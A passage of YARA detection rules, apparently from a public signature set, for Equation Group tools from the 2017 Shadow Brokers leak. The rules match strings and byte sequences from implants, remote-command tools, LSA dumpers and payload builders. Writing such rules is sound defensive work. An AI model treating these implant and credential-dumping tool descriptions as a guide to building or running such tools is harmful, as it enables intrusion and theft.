0.0.0.0:" ascii condition: ( filesize < 1000KB and 1 of them ) } rule EquationGroup_curseflower_mswin32_v_1_0_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "fdc452629ff7befe02adea3a135c3744d8585af890a4301b2a10a817e48c5cbf" strings: $s1 = "\"" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_scanner { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f180bdb247687ea9f1b58aded225d5c80a13327422cd1e0515ea891166372c53" strings: $x1 = "+daemon_version,system,processor,refid,clock" fullword ascii $x2 = "Usage: %s typeofscan IP_address" fullword ascii $x3 = "# scanning ip %d.%d.%d.%d" fullword ascii $x4 = "Welcome to the network scanning tool" fullword ascii $x5 = "***** %s ***** (length %d)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 90KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Mcl_NtMemory_Std { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "087db4f2dbf8e0679de421fec8fb2e6dd50625112eb232e4acc1408cc0bcd2d7" strings: $op1 = { 44 24 37 50 c6 44 24 38 72 c6 44 } $op2 = { 44 24 33 6f c6 44 24 34 77 c6 } $op3 = { 3b 65 c6 44 24 3c 73 c6 44 24 3d 73 c6 44 24 3e } condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_tacothief { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c71953cc84c27dc61df8f6f452c870a7880a204e9e21d9fd006a5c023b052b35" strings: $x1 = "File too large! Must be less than 655360 bytes." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_ntevt { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf" strings: $x1 = "c:\\ntevt.pdb" fullword ascii $s1 = "ARASPVU" fullword ascii $op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 } $op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 } $op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 } condition: ( uint16(0) == 0x5a4d and filesize < 700KB and $x1 or 3 of them ) } rule EquationGroup_Toolset_Apr17_Processes_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "69cf7643dbecc5f9b4b29edfda6c0295bc782f0e438f19be8338426f30b4cc74" strings: $s1 = "Select * from Win32_Process" fullword ascii $s3 = "\\\\%ls\\root\\cimv2" fullword wide $s5 = "%4ls%2ls%2ls%2ls%2ls%2ls.%11l[0-9]%1l[+-]%6s" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_st_lp { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "3b6f756cca096548dcad2b6c241c1dafd16806c060bec82a530f4d38755286a2" strings: $x1 = "Previous command: set injection processes (status=0x%x)" fullword ascii $x2 = "Secondary injection process is [no secondary process will be used]" fullword ascii $x3 = "Enter the address to be used as the spoofed IP source address (xxx.xxx.xxx.xxx) -> " fullword ascii $x4 = "E: Execute a Command on the Implant" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_EpWrapper { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "a8eed17665ee22198670e22458eb8c9028ff77130788f24f44986cce6cebff8d" strings: $x1 = "* Failed to get remote TCP socket address" fullword wide $x2 = "* Failed to get 'LPStart' export" fullword wide $s5 = "Usage: %ls " fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 20KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_DiBa_Target_2000 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f9ea8ff5985b94f635d03f3aab9ad4fb4e8c2ad931137dba4f8ee8a809421b91" strings: $s1 = "0M1U1Z1p1" fullword ascii $op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 } $op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 } $op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f } condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and 3 of them ) } rule EquationGroup_Toolset_Apr17_DllLoad_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "a42d5201af655e43cefef30d7511697e6faa2469dc4a74bc10aa060b522a1cf5" strings: $s1 = "BzWKJD+" fullword ascii $op1 = { 44 24 6c 6c 88 5c 24 6d } $op2 = { 44 24 54 63 c6 44 24 55 74 c6 44 24 56 69 } $op3 = { 44 24 5c 6c c6 44 24 5d 65 c6 44 24 5e } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_EXPA { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "2017176d3b5731a188eca1b71c50fb938c19d6260c9ff58c7c9534e317d315f8" strings: $x1 = "* The target is IIS 6.0 but is not running content indexing servicess," fullword ascii $x2 = "--ver 6 --sp --lang --attack shellcode_option[s]sL" fullword ascii $x3 = "By default, the shellcode will attempt to immediately connect s$" fullword ascii $x4 = "UNEXPECTED SHELLCODE CONFIGURATION ERRORs" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 12000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_RemoteExecute_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "4a649ca8da7b5499821a768c650a397216cdc95d826862bf30fcc4725ce8587f" strings: $s1 = "Win32_Process" fullword ascii $s2 = "\\\\%ls\\root\\cimv2" fullword wide $op1 = { 83 7b 18 01 75 12 83 63 } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_DS_ParseLogs { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "0228691d63038b072cdbf50782990d505507757efbfa87655bb2182cf6375956" strings: $x1 = "* Size (%d) of remaining capture file is too small to contain a valid header" fullword wide $x2 = "* Capture header not found at start of buffer" fullword wide $x3 = "Usage: %ws " fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Oracle_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "8e9be4960c62ed7f210ce08f291e410ce0929cd3a86fe70315d7222e3df4587e" strings: $op0 = { fe ff ff ff 48 89 9c 24 80 21 00 00 48 89 ac 24 } $op1 = { e9 34 11 00 00 b8 3e 01 00 00 e9 2a 11 00 00 b8 } $op2 = { 48 8b ca e8 bf 84 00 00 4c 8b e0 8d 34 00 44 8d } condition: ( uint16(0) == 0x5a4d and filesize < 500KB and all of them ) } rule EquationGroup_Toolset_Apr17_DmGz_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "5964966041f93d5d0fb63ce4a85cf9f7a73845065e10519b0947d4a065fdbdf2" strings: $s1 = "\\\\.\\%ls" fullword ascii $s3 = "6\"6<6C6H6M6Z6f6t6" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetResourceName { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "537793d5158aecd0debae25416450bd885725adfc8ca53b0577a3df4b0222e2e" strings: $x1 = "Updates the name of the dll or executable in the resource file" fullword ascii $x2 = "*NOTE: SetResourceName does not work with PeddleCheap versions" fullword ascii $x3 = "2 = [appinit.dll] level4 dll" fullword ascii $x4 = "1 = [spcss32.exe] level3 exe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_drivers_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "ee8b048f1c6ba821d92c15d614c2d937c32aeda7b7ea0943fd4f640b57b1c1ab" strings: $s1 = ".?AVFeFinallyFailure@@" fullword ascii $s2 = "hZwLoadDriver" fullword ascii $op1 = { b0 01 e8 58 04 00 00 c3 33 } condition: ( uint16(0) == 0x5a4d and filesize < 30KB and all of them ) } rule EquationGroup_Toolset_Apr17_Shares_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "6c57fb33c5e7d2dee415ae6168c9c3e0decca41ffe023ff13056ff37609235cb" strings: $s1 = "Select * from Win32_Share" fullword ascii $s2 = "slocalhost" fullword wide $s3 = "\\\\%ls\\root\\cimv2" fullword wide $s4 = "\\\\%ls\\%ls" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_ntfltmgr { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "3df61b8ef42a995b8f15a0d38bc51f2f08f8d9a2afa1afc94c6f80671cf4a124" hash2 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5" hash3 = "980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43" strings: $s3 = "wCw3wDwAw2wNw@wEwZw2wDwEwBwZwFwFw4w2wZw5w1w4wFwZwGwOwGwGwEw5w2wFwGwDwFwOw" fullword ascii $s6 = "w+w;w2w0w6w4w.w(wRw" fullword ascii $op1 = { 80 f7 ff ff 49 89 84 34 18 02 00 00 41 83 a4 34 } $op2 = { ff 15 0b 34 00 00 eb 92 } $op3 = { 4d 8d b4 34 08 02 00 00 4d 85 f6 0f 84 ae } $op4 = { 8b ca 2b ce 8d 34 01 0f b7 3e 66 3b 7d f0 89 75 } $op5 = { 8a 40 01 00 c7 47 70 } $op6 = { e9 3c ff ff ff 6a ff 8d 45 f0 50 e8 27 11 00 00 } $op7 = { 8b 45 08 53 57 8b 7d 0c c7 40 34 } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 4 of them ) } rule EquationGroup_Toolset_Apr17_DiBa_Target_BH { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "7ae9a247b60dc31f424e8a7a3b3f1749ba792ff1f4ba67ac65336220021fce9f" strings: $op0 = { 44 89 20 e9 40 ff ff ff 8b c2 48 8b 5c 24 60 48 } $op1 = { 45 33 c9 49 8d 7f 2c 41 ba } $op2 = { 89 44 24 34 eb 17 4c 8d 44 24 28 8b 54 24 30 48 } condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17_PC_LP { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "3a505c39acd48a258f4ab7902629e5e2efa8a2120a4148511fe3256c37967296" strings: $s1 = "* Failed to get connection information. Aborting launcher!" fullword wide $s2 = "Format: [lp port]" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_RemoteCommand_Lp { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "57b47613a3b5dd820dae59fc6dc2b76656bd578f015f367675219eb842098846" strings: $s1 = "Failure parsing command from %hs:%u: os=%u plugin=%u" fullword wide $s2 = "Unable to get TCP listen port: %08x" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_lp_mstcp { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "2ab1e1d23021d887759750a0c053522e9149b7445f840936bbc7e703f8700abd" strings: $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide $s2 = "_PacketNDISRequestComplete@12\"" fullword ascii $s3 = "_LDNdis5RegDeleteKeys@4" fullword ascii $op1 = { 89 7e 04 75 06 66 21 46 02 eb } $op2 = { fc 74 1b 8b 49 04 0f b7 d3 66 83 } $op3 = { aa 0f b7 45 fc 8b 52 04 8d 4e } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and ( all of ($s*) or all of ($op*) ) ) } rule EquationGroup_Toolset_Apr17_renamer { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "9c30331cb00ae8f417569e9eb2c645ebbb36511d2d1531bb8d06b83781dfe3ac" strings: $s1 = "FILE_NAME_CONVERSION.LOG" fullword wide $s2 = "Log file exists. You must delete it!!!" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_PC_Exploit { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0" strings: $s1 = "\\\\.\\pipe\\pcheap_reuse" fullword wide $s2 = "**** FAILED TO DUPLICATE SOCKET ****" fullword wide $s3 = "**** UNABLE TO DUPLICATE SOCKET TYPE %u ****" fullword wide $s4 = "YOU CAN IGNORE ANY 'ServiceEntry returned error' messages after this..." fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 20KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_PC_Level3_Gen { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c7dd49b98f399072c2619758455e8b11c6ee4694bb46b2b423fa89f39b185a97" hash2 = "f6b723ef985dfc23202870f56452581a08ecbce85daf8dc7db4491adaa4f6e8f" strings: $s1 = "S-%u-%u" fullword ascii $s2 = "Copyright (C) Microsoft" fullword wide $op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 } $op2 = { 44 24 4e 41 88 5c 24 4f ff } $op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 } condition: ( uint16(0) == 0x5a4d and filesize < 400KB and 3 of them ) } rule EquationGroup_Toolset_Apr17_put_Implant9x { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "8fcc98d63504bbacdeba0c1e8df82f7c4182febdf9b08c578d1195b72d7e3d5f" strings: $s1 = "3&3.3<3A3F3K3V3c3m3" fullword ascii $op1 = { c9 c2 08 00 b8 72 1c 00 68 e8 c9 fb ff ff 51 56 } $op2 = { 40 1b c9 23 c8 03 c8 38 5d 14 74 05 6a 03 58 eb } condition: ( uint16(0) == 0x5a4d and filesize < 20KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_promiscdetect_safe { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "6070d8199061870387bb7796fb8ccccc4d6bafed6718cbc3a02a60c6dc1af847" strings: $s1 = "running on this computer!" fullword ascii $s2 = "- Promiscuous (capture all packets on the network)" fullword ascii $s3 = "Active filter for the adapter:" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_PacketScan_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "9b97cac66d73a9d268a15e47f84b3968b1f7d3d6b68302775d27b99a56fbb75a" strings: $op0 = { e9 ef fe ff ff ff b5 c0 ef ff ff 8d 85 c8 ef ff } $op1 = { c9 c2 04 00 b8 34 26 00 68 e8 40 05 00 00 51 56 } $op2 = { e9 0b ff ff ff 8b 45 10 8d 4d c0 89 58 08 c6 45 } condition: ( uint16(0) == 0x5a4d and filesize < 30KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetPorts { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "722d3cf03908629bc947c4cca7ce3d6b80590a04616f9df8f05c02de2d482fb2" strings: $s1 = "USAGE: SetPorts [port2] [port3] [port4] [port5]" fullword ascii $s2 = "Valid versions are: 1 = PC 1.2 2 = PC 1.2 (24 hour)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_GrDo_FileScanner_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "8d2e43567e1360714c4271b75c21a940f6b26a789aa0fce30c6478ae4ac587e4" strings: $s1 = "system32\\winsrv.dll" fullword wide $s2 = "raw_open CreateFile error" fullword ascii $s3 = "\\dllcache\\" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 400KB and all of them ) } rule EquationGroup_Toolset_Apr17_msgks_mskgu { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "7b4986aee8f5c4dca255431902907b36408f528f6c0f7d7fa21f079fa0a42e09" hash2 = "ef906b8a8ad9dca7407e0a467b32d7f7cf32814210964be2bfb5b0e6d2ca1998" strings: $op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 } $op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 } $op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f } condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_Ifconfig_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "1ebfc0ce7139db43ddacf4a9af2cb83a407d3d1221931d359ee40588cfd0d02b" strings: $s1 = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\%hs" fullword wide $op1 = { 0f be 37 85 f6 0f 85 4e ff ff ff 45 85 ed 74 21 } $op2 = { 4c 8d 44 24 34 48 8d 57 08 41 8d 49 07 e8 a6 4b } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_DiBa_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6" strings: $op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 } $op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 } $op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 } condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17_Dsz_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "fbe103fac45abe4e3638055a3cac5e7009166f626cf2d3049fb46f3b53c1057f" hash2 = "ad1dddd11b664b7c3ad6108178a8dade0a6d9795358c4a7cedbe789c62016670" strings: $s1 = "%02u:%02u:%02u.%03u-%4u: " fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and all of them ) } rule EquationGroup_Toolset_Apr17_GenKey { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "b6f100b21da4f7e3927b03b8b5f0c595703b769d5698c835972ca0c81699ff71" strings: $x1 = "* PrivateEncrypt -> PublicDecrypt FAILED" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_wmi_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "de08d6c382faaae2b4b41b448b26d82d04a8f25375c712c12013cb0fac3bc704" strings: $x1 = "SELECT ProcessId,Description,ExecutablePath FROM Win32_Process" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 50KB and all of them ) } rule EquationGroup_Toolset_Apr17_clocksvc { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c1bcd04b41c6b574a5c9367b777efc8b95fe6cc4e526978b7e8e09214337fac1" strings: $x1 = "~debl00l.tmp" fullword ascii $x2 = "\\\\.\\mailslot\\c54321" fullword ascii $x3 = "\\\\.\\mailslot\\c12345" fullword ascii $x4 = "nowMutex" fullword ascii $s1 = "System\\CurrentControlSet\\Services\\MSExchangeIS\\ParametersPrivate" fullword ascii $s2 = "000000005017C31B7C7BCF97EC86019F5026BE85FD1FB192F6F4237B78DB12E7DFFB07748BFF6432B3870681D54BEF44077487044681FB94D17ED04217145B98" ascii $s3 = "00000000E2C9ADBD8F470C7320D28000353813757F58860E90207F8874D2EB49851D3D3115A210DA6475CCFC111DCC05E4910E50071975F61972DCE345E89D88" ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($x*) or 2 of ($s*) ) ) } rule EquationGroup_Toolset_Apr17_xxxRIDEAREA { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "214b0de83b04afdd6ad05567825b69663121eda9e804daff9f2da5554ade77c6" strings: $x1 = "USAGE: %s -i InputFile -o OutputFile [-f FunctionOrdinal] [-a FunctionArgument] [-t ThreadOption]" fullword ascii $x2 = "The output payload \"%s\" has a size of %d-bytes." fullword ascii $x3 = "ERROR: fwrite(%s) failed on ucPayload" fullword ascii $x4 = "Load and execute implant within the existing thread" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_yak_min_install { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f67214083d60f90ffd16b89a0ce921c98185b2032874174691b720514b1fe99e" strings: $s1 = "driver start" fullword ascii $s2 = "DeviceIoControl Error: %d" fullword ascii $s3 = "Phlook" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetOurAddr { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "04ccc060d401ddba674371e66e0288ebdbfa7df74b925c5c202109f23fb78504" strings: $s1 = "USAGE: SetOurAddr [IP/IPX address]" fullword ascii $s2 = "Replaced default IP address (127.0.0.1) with Local IP Address %d.%d.%d.%d" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_GetAdmin_LSADUMP_ModifyPrivilege_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c8b354793ad5a16744cf1d4efdc5fe48d5a0cf0657974eb7145e0088fcf609ff" hash2 = "5f06ec411f127f23add9f897dc165eaa68cbe8bb99da8f00a4a360f108bb8741" strings: $s1 = "\\system32\\win32k.sys" fullword wide $s2 = "hKeAddSystemServiceTable" fullword ascii $s3 = "hPsDereferencePrimaryToken" fullword ascii $s4 = "CcnFormSyncExFBC" fullword wide $s5 = "hPsDereferencePrimaryToken" fullword ascii $op1 = { 0c 2b ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b } $op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 } $op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 } condition: ( uint16(0) == 0x5a4d and filesize < 80KB and ( 4 of ($s*) or all of ($op*) ) ) } rule EquationGroup_Toolset_Apr17_SendPKTrigger { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26" strings: $x1 = "----====**** PORT KNOCK TRIGGER BEGIN ****====----" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_DmGz_Target_2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "55ac29b9a67e0324044dafaba27a7f01ca3d8e4d8e020259025195abe42aa904" strings: $s1 = "\\\\.\\%ls" fullword ascii $op0 = { e8 ce 34 00 00 b8 02 00 00 f0 e9 26 02 00 00 48 } $op1 = { 8b 4d 28 e8 02 05 00 00 89 45 34 eb 07 c7 45 34 } $op2 = { e8 c2 34 00 00 90 48 8d 8c 24 00 01 00 00 e8 a4 } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_mstcp32_DXGHLP16_tdip { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6" hash2 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665" hash3 = "a5ec4d102d802ada7c5083af53fd9d3c9b5aa83be9de58dbb4fac7876faf6d29" strings: $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide $s2 = "\\DosDevices\\%ws" fullword wide $s3 = "\\Device\\%ws_%ws" fullword wide $s4 = "sys\\mstcp32.dbg" fullword ascii $s5 = "%ws%03d%ws%wZ" fullword wide $s6 = "TCP/IP driver" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 4 of them ) } rule EquationGroup_Toolset_Apr17_regprobe { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "99a42440d4cf1186aad1fd09072bd1265e7c6ebbc8bcafc28340b4fe371767de" strings: $x1 = "Usage: %s targetIP protocolSequence portNo [redirectorIP] [CLSID]" fullword ascii $x2 = "key does not exist or pinging w2k system" fullword ascii $x3 = "RpcProxy=255.255.255.255:65536" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_DoubleFeatureDll_dll_2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = 